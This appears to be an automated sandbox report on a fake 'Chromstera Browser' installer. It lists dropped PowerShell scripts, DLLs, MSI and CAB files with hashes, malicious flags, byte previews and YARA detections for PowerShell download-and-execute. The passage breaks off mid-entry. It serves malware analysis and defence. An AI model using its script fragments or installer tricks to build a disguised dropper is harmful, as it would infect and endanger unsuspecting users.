                                                                                                                                                                            SHA1:0776A64C20825EA71498B1CB3D02B71DA01EF2FA
                                                                                                                                                                            SHA-256:2C9001B038547856DB0929D5F4F452F35798F9F9DB5B3D6801E2EA97D80CC36A
                                                                                                                                                                            SHA-512:E8DC746656C43DCFC0377587EC8164E2D7676AB699DB74CEA561A1A2593EAABBA61AB9745B2FACA3276E3A236A99E220B6375CD9A835C409239949E5B2CC2837
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\pssED0B.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):41576
                                                                                                                                                                            Entropy (8bit):4.059331023443082
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:5WbLVyvvo51AbfOcQ8k1jauBugqlgV4WvjJudHaUtlGGVo:20g8TmFplQSJNy5o
                                                                                                                                                                            MD5:C4F8384C5715DF5B6CFAFE90074667AB
                                                                                                                                                                            SHA1:0D0031C6BB596903C9E639B02D9E26126320DC4F
                                                                                                                                                                            SHA-256:032093F045E28B9069556255FAC3B15124226890EC6D92AAC6BBD0AD4E4117F3
                                                                                                                                                                            SHA-512:AAF4B13DEC53C74AF55C451D1EADF3775CB31533D9AA34EE9852CF2FB8280FCA708E3E316181B918ECBB15D9061EEDB52E9DEE21755885A8A365F4F0861C34D1
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scr1333.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):34966
                                                                                                                                                                            Entropy (8bit):4.012086952694085
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:Wo51AbfOcQ8k1jauBuAFXTsXBcNssJGZqZ/lo:F8TmFp1FXksDNo
                                                                                                                                                                            MD5:6F892EAF9EFFB6F18FB5257A14B7DED3
                                                                                                                                                                            SHA1:4CC7DEBDE228DFCE04168B92111A5B9C610E1E67
                                                                                                                                                                            SHA-256:7ABC5EB0930087DF17AD7DFA4915F116C7C70BEA4F63222AF096B7EA7D8730AC
                                                                                                                                                                            SHA-512:37824C4CA30B2B02B1C973912A2BD596FA0BF4DAB34270CC33129F9AFA853B725729622DECF0B96460ACF0CD5975E70ABCB0A8828C05071B29BFB7BA62707ED0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..S.t.o.p.-.P.r.o.c.e.s.s. .-.N.a.m.e. .'.m.s.e.d.g.e.'.;.....#. .S.I.G. .#. .B.e.g.i.n. .s.i.g.n.a.t.u.r.e. .b.l.o.c.k.....#. .M.I.I.v.7.w.Y.J.K.o.Z.I.h.v.c.N.A.Q.c.C.o.I.I.v.4.D.C.C.L.9.w.C.A.Q.E.x.D.z.A.N.B.g.l.g.h.k.g.B.Z.Q.M.E.A.g.E.F.A.D.B.5.B.g.o.r.....#. .B.g.E.E.A.Y.I.3.A.g.E.E.o.G.s.w.a.T.A.0.B.g.o.r.B.g.E.E.A.Y.I.3.A.g.E.e.M.C.Y.C.A.w.E.A.A.A.Q.Q.H.8.w.7.Y.F.l.L.C.E.6.3.J.N.L.G.....#. .K.X.7.z.U.Q.I.B.A.A.I.B.A.A.I.B.A.A.I.B.A.A.I.B.A.D.A.x.M.A.0.G.C.W.C.G.S.A.F.l.A.w.Q.C.A.Q.U.A.B.C.B.T.C.k.k.6.X.C.8.8.D.0.4.M.....#. .s.L.c.v.S.S.B.y.y.U.H.Z.S.i.z.I.1.v.Q.I.A.A.q.W.9.p.S.4.O.K.C.C.F.M.Y.w.g.g.a.j.M.I.I.E.i.6.A.D.A.g.E.C.A.h.B.4.S.q.k.o.H.V.l.v.....#. .n.N.D.O.s.P.6.p.e.m.S.b.M.A.0.G.C.S.q.G.S.I.b.3.D.Q.E.B.D.A.U.A.M.E.w.x.I.D.A.e.B.g.N.V.B.A.s.T.F.0.d.s.b.2.J.h.b.F.N.p.Z.2.4.g.....#. .U.m.9.v.d.C.B.D.Q.S.A.t.I.F.I.2.M.R.M.w.E.Q.Y.D.V.Q.Q.K.E.w.p.H.b.G.9.i.Y.W.x.T.a.W.d.u.M.R.M.w.E.Q.Y.D.V.Q.Q.D.E.w.p.H.b.G.9.i.....#. .Y.W.x.T.a.W.d.u.M.B.4.X.D.T.I.w.M.D.k.x.N.j.A.w.M.D.A.w.

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scrECF8.ps1

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):34966
                                                                                                                                                                            Entropy (8bit):4.011720633275862
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:mo51AbfOcQ8k1jauBuT4WvjJudHaUtlGCm:V8TmFpyNyvm
                                                                                                                                                                            MD5:DDAD32F3A446F9322407EB5E73C68E97
                                                                                                                                                                            SHA1:D59D11FE20053B58831C2E255E1077DDC635BCA6
                                                                                                                                                                            SHA-256:CCF08E7D01C0AE0A7D2BDEAB343443F41E9CD51E40450B6B4CE182F256C0116C
                                                                                                                                                                            SHA-512:09778E766B1A15E6C5F0D117B06FA07CC7B8FD2E632FA69D7AFA487D9A930D2F1B5D7BD3E585EFF79BBCE77377C854C435C7A418910D5A958FE9E204612AB688
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:..S.t.o.p.-.P.r.o.c.e.s.s. .-.N.a.m.e. .'.c.h.r.o.m.e.'.;.....#. .S.I.G. .#. .B.e.g.i.n. .s.i.g.n.a.t.u.r.e. .b.l.o.c.k.....#. .M.I.I.v.7.g.Y.J.K.o.Z.I.h.v.c.N.A.Q.c.C.o.I.I.v.3.z.C.C.L.9.s.C.A.Q.E.x.D.z.A.N.B.g.l.g.h.k.g.B.Z.Q.M.E.A.g.E.F.A.D.B.5.B.g.o.r.....#. .B.g.E.E.A.Y.I.3.A.g.E.E.o.G.s.w.a.T.A.0.B.g.o.r.B.g.E.E.A.Y.I.3.A.g.E.e.M.C.Y.C.A.w.E.A.A.A.Q.Q.H.8.w.7.Y.F.l.L.C.E.6.3.J.N.L.G.....#. .K.X.7.z.U.Q.I.B.A.A.I.B.A.A.I.B.A.A.I.B.A.A.I.B.A.D.A.x.M.A.0.G.C.W.C.G.S.A.F.l.A.w.Q.C.A.Q.U.A.B.C.C.V.x.k.5.R.r.T.m.M.D.F.8.M.....#. .7.g.Z.7.U.M.H.k.e.8.Z.x.E.3.J.b.S.X.E.t.O.m.I.N.V.O.e.+.8.a.C.C.F.M.Y.w.g.g.a.j.M.I.I.E.i.6.A.D.A.g.E.C.A.h.B.4.S.q.k.o.H.V.l.v.....#. .n.N.D.O.s.P.6.p.e.m.S.b.M.A.0.G.C.S.q.G.S.I.b.3.D.Q.E.B.D.A.U.A.M.E.w.x.I.D.A.e.B.g.N.V.B.A.s.T.F.0.d.s.b.2.J.h.b.F.N.p.Z.2.4.g.....#. .U.m.9.v.d.C.B.D.Q.S.A.t.I.F.I.2.M.R.M.w.E.Q.Y.D.V.Q.Q.K.E.w.p.H.b.G.9.i.Y.W.x.T.a.W.d.u.M.R.M.w.E.Q.Y.D.V.Q.Q.D.E.w.p.H.b.G.9.i.....#. .Y.W.x.T.a.W.d.u.M.B.4.X.D.T.I.w.M.D.k.x.N.j.A.w.M.D.A.w.

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\shi3105.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5038592
                                                                                                                                                                            Entropy (8bit):6.043058205786219
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
                                                                                                                                                                            MD5:11F7419009AF2874C4B0E4505D185D79
                                                                                                                                                                            SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
                                                                                                                                                                            SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
                                                                                                                                                                            SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L*......N*.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\shiC6A3.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5038592
                                                                                                                                                                            Entropy (8bit):6.043058205786219
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
                                                                                                                                                                            MD5:11F7419009AF2874C4B0E4505D185D79
                                                                                                                                                                            SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
                                                                                                                                                                            SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
                                                                                                                                                                            SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L*......N*.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {2BF917DE-5B34-453F-A1C8-08CE02C334FC}, Number of Words: 2, Subject: Chromstera Browser, Author: Chromstera Solutions, Name of Creating Application: Chromstera Browser, Template: x64;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Aug 11 12:56:12 2023, Number of Pages: 200
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5414912
                                                                                                                                                                            Entropy (8bit):6.6703025648499255
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:98304:IYJRr+uKTFK+XpBflMPzidUtYoS9PURx1RK/Tvn/8/n:PJ1eBfM2NP6cr/M
                                                                                                                                                                            MD5:2F35E6F54DACD3559EF63F8493405884
                                                                                                                                                                            SHA1:0CFBF79DBD20D9DBD6F88CA7EE51B476DEF73A85
                                                                                                                                                                            SHA-256:590A97E2D47B8B1009728087DBA010ADDA34C9666103791A60C9DDD984C9644E
                                                                                                                                                                            SHA-512:70F600EB430D908F99E8D9924AE539BCFC21F43ADEA366C3BF2C0D207BC90881381BC3536E1DE17ED2A5400ADC8190A84C246E811593B8B1A682DA10AEDED1A0
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi, Author: Joe Security
                                                                                                                                                                            Preview:......................>...................S...................................\.......~......./...0...1...2...3...4...5...6...7.......................U...V...W...X...Y...Z...[.......................................]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...........................................................t!...!...!...!...!...!...!...!...!...!...!...................(......................................................................................................................?...............(...B........................................................................................... ...!..."...#...$...%...&...'...5...)...6...+...,...-......./...0...1...2...3...4.......7...?...8...9...:...;...<...=...>...C...@...A...J...N...D...E...F...G...H...I...M...K...L........&..O...P...Q...R...S...T...U...V...W...X...Y...Z...[....&......^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                            C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main1.cab

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:Microsoft Cabinet archive data, many, 537602 bytes, 3 files, at 0x44 +A "manifest.json" +A "service.js", flags 0x4, ID 1234, number 1, extra bytes 20 in head, 37 datablocks, 0x1 compression
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):549914
                                                                                                                                                                            Entropy (8bit):7.99656918630297
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:12288:5PssyeijXugzQ9ng7tLKQgxVUU+e0FXCQsY8Iy0W:G7zGYKTMlFXGYvW
                                                                                                                                                                            MD5:6734CC1E240B7F556E3AE09EA56E02C9
                                                                                                                                                                            SHA1:E8D7810283CC2D788C620E31B677B9D69944E6CB
                                                                                                                                                                            SHA-256:0036A0F85C7D9276BD0C5EB04B54DB37BF8ABA49453BB2D338FF1FA278F756C1
                                                                                                                                                                            SHA-512:5E8285166F392AFBFD5448B50AAFE4FCA551EE82C744574C344114AD88BFEE7E70AE6CDD945E0FD4A98B52CE68BE5EB2530D84BCB16FA3C969292FBCA26321C8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MSCF.....4......D............................4...0..............%.............EUv. .manifest.json.g..........VA. .service.js.._..B......W.n .updater.exe.J..o.<..CK.}}|T..d..... ..A".Wj......1...3..."..!.e2.X!.N.r.=.r.{.m.T...m..Vl.........XQc.c...! r.Zk.93I&..~.f.}..k..^_{.=....>a...&|7g....js.Z.aU...`..{kVo.^......jj....L.ekW.[]..._.{.O......._.>.n%.!.....j6..wU..5.. ..(.R]K..O.?...Z.~e`..P..z....E...x).]..UkW..O.....b....j.]5%Vg..u.....X.f..)+V.\...j..I..U..9....v..n....U..z....M`.......wH.$Y.O.%i.$..JC.g.....8Rz...k.Z..q......5._.bm.+.[...........r.-*.....2b..h./6-....J......;.{.H..;~..H/}.f.2..=.jz...J.~f......>.U.w.[....#....Xq..o.......N...)I.-)...VF.:.......FH.A+.=.5]..pQ?BP...$).h...v.&b>....p.U...E..l.K-.....0....R...6J.>/I{..)mH0.......{...}...S$.....c..n...f?|/Z1B .c....#I.L.Y..B.|....3.jD_...).....>...........O...........7.~.>...Uk.CE.;.@...7...9Ca...o...Z....PZ........).5..<...,.O.K.k...Oe..e...Ol..%E..t...S]".].O.......J..

                                                                                                                                                                            C:\Windows\Installer\6bc77d.msi

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {2BF917DE-5B34-453F-A1C8-08CE02C334FC}, Number of Words: 2, Subject: Chromstera Browser, Author: Chromstera Solutions, Name of Creating Application: Chromstera Browser, Template: x64;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Aug 11 12:56:12 2023, Number of Pages: 200
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5414912
                                                                                                                                                                            Entropy (8bit):6.6703025648499255
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:98304:IYJRr+uKTFK+XpBflMPzidUtYoS9PURx1RK/Tvn/8/n:PJ1eBfM2NP6cr/M
                                                                                                                                                                            MD5:2F35E6F54DACD3559EF63F8493405884
                                                                                                                                                                            SHA1:0CFBF79DBD20D9DBD6F88CA7EE51B476DEF73A85
                                                                                                                                                                            SHA-256:590A97E2D47B8B1009728087DBA010ADDA34C9666103791A60C9DDD984C9644E
                                                                                                                                                                            SHA-512:70F600EB430D908F99E8D9924AE539BCFC21F43ADEA366C3BF2C0D207BC90881381BC3536E1DE17ED2A5400ADC8190A84C246E811593B8B1A682DA10AEDED1A0
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Yara Hits:
                                                                                                                                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\6bc77d.msi, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\6bc77d.msi, Author: Joe Security
                                                                                                                                                                            Preview:......................>...................S...................................\.......~......./...0...1...2...3...4...5...6...7.......................U...V...W...X...Y...Z...[.......................................]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...........................................................t!...!...!...!...!...!...!...!...!...!...!...................(......................................................................................................................?...............(...B........................................................................................... ...!..."...#...$...%...&...'...5...)...6...+...,...-......./...0...1...2...3...4.......7...?...8...9...:...;...<...=...>...C...@...A...J...N...D...E...F...G...H...I...M...K...L........&..O...P...Q...R...S...T...U...V...W...X...Y...Z...[....&......^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                            C:\Windows\Installer\MSI11D0.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):664896
                                                                                                                                                                            Entropy (8bit):6.580111290566735
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:lurEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2X45c6EKgkj:0ihNREtRdYndJP32R7vKG+47/L0I5jEg
                                                                                                                                                                            MD5:F2DD0D7EBAB0352E434FA65386425F33
                                                                                                                                                                            SHA1:A6D808538D1A0D7984B4AE3DCD16AEA185702E50
                                                                                                                                                                            SHA-256:1C65E72519B605E0A322DD32625782978A5BC74CEC81F73638A215CA5B9D0F9D
                                                                                                                                                                            SHA-512:76D1F0125835C13B5E0CE52E9AAB450713CB45A82544215E1EE17B094FD5D16B066544E032E96F94F727427F055F691655D6DBBB5E4A8C54AF774A2B97F524C0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.:.w.T,w.T,w.T,..W-z.T,..Q-.T,..P-a.T,..P-f.T,..W-m.T,..Q-+.T,..U-`.T,w.U,\.T,n.]-@.T,n.T-v.T,n.,v.T,w..,v.T,n.V-v.T,Richw.T,........PE..L...K>.d.........."!...$.r..................................................0......+.....@..........................q.......q..........................@=.......\......p...............................@............................................text....q.......r.................. ..`.rdata..v............v..............@..@.data................h..............@....rsrc...............................@..@.reloc...\.......^..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSI4739.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):570176
                                                                                                                                                                            Entropy (8bit):6.4754135618709885
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:V7illiy0jC24y27NuNMM1o6BFCzS0IJPD+G63u+znIBhVWYusLQys6od5zg:UuGBYusLRs6S5zg
                                                                                                                                                                            MD5:514314174B6F6A3AB2195C456B83AA1E
                                                                                                                                                                            SHA1:D4CEDCB663F534FBDC93D7A53E0A5A4CAE2B4E7B
                                                                                                                                                                            SHA-256:DC20BD05C938C5C9CE13D2D3CD78D1479B7D74C24E1356F36C7C8E8F6BEFE597
                                                                                                                                                                            SHA-512:061AE3D1D410F24EB6C13E3B0AF81E760881E9F4A71EA1FB9F84E84D20047F719B845BEA7F435454DF33310FE1294D46F8F7DD40EAAFFCEB53D280A9238BD9F2
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aawD..$D..$D..$.r.%N..$.r.%...$.~.%V..$.~.%N..$.~.%...$.r.%P..$.r.%E..$.r.%]..$D..$...$]..%^..$]..$E..$D..$E..$]..%E..$RichD..$........................PE..d....>.d.........."....$.4...h......`..........@..........................................`.............................................................8....p...?...v..@=......l...@x..p....................y..(....w..@............P.. ............................text...<3.......4.................. ..`.rdata.......P.......8..............@..@.data...,G... ......................@....pdata...?...p...@..................@..@_RDATA..\............X..............@..@.rsrc...8............Z..............@..@.reloc..l............f..............@..B................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSIC933.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
                                                                                                                                                                            SHA-512:2AB40A563FA4AFE48BA74067653A244BDD53F9C04CD3764F29C5F80349F68B2126C6442E0A75FFB3C207F8C9267D4FAE7B407CA7D1D5E31D729B84B0EDEA817C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0......c.....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Installer\MSIC9EF.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):602432
                                                                                                                                                                            Entropy (8bit):6.469756311917561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:2aFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl4mN9ysU5p/s8g73W:jYL9HXVW0xOA+KlZC4v65ps8g73W
                                                                                                                                                                            MD5:FE647318C4CC7F18012BDF5F8F96C468
                                                                                                                                                                            SHA1:82E516C4247CA5EAC3365BF80120D8A1F30E3042
                                                                                                                                                                            SHA-256:AEC9F4CB37604C67C69FC0FEE1DC630DB016E1471212006ED787DD9432158E69
